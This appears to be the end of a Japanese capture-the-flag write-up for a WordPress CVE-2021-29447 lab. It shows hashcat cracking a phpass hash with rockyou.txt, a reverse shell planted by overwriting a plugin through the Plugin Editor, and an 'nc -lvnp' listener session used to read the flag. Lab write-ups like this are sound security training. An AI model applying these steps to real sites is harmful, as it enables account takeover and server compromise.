OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-skylake-avx512-AMD Ryzen 5 PRO 8640HS w/ Radeon 760M Graphics, 4779/9558 MB (2048 MB allocatable), 12MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 39
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 51
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Optimized-Kernel
* Zero-Byte
* Single-Hash
* Single-Salt
Watchdog: Temperature abort trigger set to 90c
Host memory allocated for this attack: 515 MB (6921 MB free)
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$P$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1:[CORP-001_PASSWORD]
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 400 (phpass)
Hash.Target......: $P$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1
Time.Started.....: Sun Jun 14 23:19:18 2026 (0 secs)
Time.Estimated...: Sun Jun 14 23:19:18 2026 (0 secs)
Kernel.Feature...: Optimized Kernel (password length 0-39 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 3913 H/s (12.56ms) @ Accel:144 Loops:1024 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1728/14344385 (0.01%)
Rejected.........: 0/1728 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:7168-8192
Candidate.Engine.: Device Generator
Candidates.#01...: 123456 -> argentina
Hardware.Mon.#01.: Temp: 77c Util: 10%
Started: Sun Jun 14 23:19:02 2026
Stopped: Sun Jun 14 23:19:19 2026
すると、パスワードを解読することに成功しました。
Answer: [CORP-001_PASSWORD]
Compromise the machine and locate flag.txt
先ほど取得したパスワードを用いて、corp-001に再ログインします。
Pluginタブに移動すると、Akismet Anti-Spamというプラグインがあるため、有効します。その後、Plugin Editorで見てみると、編集できそうです。
以下のリバースシェルスクリプトを利用し、自分のIPに変更後、実際に上書き保存します。
すると以下のようにフラグが取得可能です。
$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.183.253] from (UNKNOWN) [10.48.136.148] 32826
Linux ubuntu 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
12:14:23 up 57 min, 0 users, load average: 0.01, 0.02, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ubuntu:/home/stux/flag$ cat flag.txt
cat flag.txt
thm{XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}
Akismetがバージョンの関係で動かず、パクりました。
終わり
今回は、WordpressのCVE-2021-29447についてのラボを解きました。
WordPressで悪用されそうなユースケースではあったので、息抜きながら解くのにはいかがでしょうか?
Tipsは特になさそうなので、これにて以上となります。
ご参考になると幸いです。


